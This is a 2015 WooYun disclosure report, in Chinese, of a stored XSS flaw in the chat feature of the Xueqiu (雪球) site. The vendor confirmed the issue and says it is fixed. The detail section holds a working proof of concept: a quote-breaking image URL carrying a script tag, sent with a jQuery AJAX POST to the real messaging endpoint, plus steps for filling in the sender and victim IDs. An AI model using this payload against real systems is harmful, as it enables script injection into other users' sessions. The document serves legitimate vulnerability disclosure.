当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099594

漏洞标题:雪球某站XSS

相关厂商:雪球

漏洞作者: 黑色雨滴

提交时间:2015-03-05 15:38

修复时间:2015-04-20 14:22

公开时间:2015-04-20 14:22

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-05: 细节已通知厂商并且等待厂商处理中
2015-03-05: 厂商已经确认,细节仅向厂商公开
2015-03-15: 细节向核心白帽子及相关领域专家公开
2015-03-25: 细节向普通白帽子公开
2015-04-04: 细节向实习白帽子公开
2015-04-20: 细节向公众公开

简要描述:

可通过在线聊天执行任意代码

详细说明:

// 这是一段图片消息 的html结构 其中 a 标签的 href 可以 引号爆破 然后插入js脚本
<div class="msg_icw">
<a class="snbim-msgitem-image" href="http://xueqiu.com/im/image/2DF52_2_1349803048_5331291206_14be7870a2c363fed04e345e.jpg?1440x900" target="_blank">
<img class="snbim_msgimg" width="120" height="75" title="查看原图[1440x900]" src="http://xueqiu.com/im/image/2DF52_2_1349803048_5331291206_14be7870a2c363fed04e345e.jpg!thumb.png" onload="$(this).trigger('loadsucc')" onerror="$(this).trigger('err')"> </a> <span class="snbim-msgitem-time">09:32</span>
</div>

var pa1={"toId":5331291206,"toGroup":false,"sequenceId":365395132,"image":"http://xueqiu.com/im/image/2DF52_2_1349803048_5331291206_14be7870a2c363fed04e345e.jpg?1440x900"}
// bo.imgage 处可以引号爆破 这是个正常参数
var bo={"toId":5331291206,"toGroup":false,"sequenceId":365395134,"image":"http://xueqiu.com/im/image/2DF52_2_1349803048_5331291206_14be7870a2c363fed04e345e.jpg?1440x900\" > <script>alert(1)</script>"}
// 这是攻击参数
// 注意sequenceId 要唯一,自己写个没用过的id吧
jQuery.ajax({url: "https://im9.xueqiu.com/im-comet/v2/messages.json?user_id=1349803048",type: "POST",timeout: 2e4,contentType: "application/json",data: JSON.stringify(bo)});


url的user_id 你的账号id ,抓http请求包就能看见
toId 是对方id ,你随便搜个人 发消息 就能看见
漏洞的危害程度你们懂的。
其次,不算漏洞,只算bug,也一并改了吧。
文本消息 前台页面没过滤 。 发消息的时候 直接输入<script>alert(1)</script>是可以弹框的。 还好后台先正则过滤,又html转义。 但是,前台不过滤,影响体验。。普通正常用户 打个p><p 这种字符表情都不行。。都被你们搞乱了。。

漏洞证明:

下图是发送方的反应

xue1.PNG


下图是接收方的反应

jiesh.PNG

修复方案:

过滤。。。

版权声明:转载请注明来源 黑色雨滴@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-05 17:51

厂商回复:

确认有问题,正在修复中,感谢

最新状态:

2015-03-06:已经修复 XSS 的问题,非常感谢白帽子请告知联系方式,寄送礼物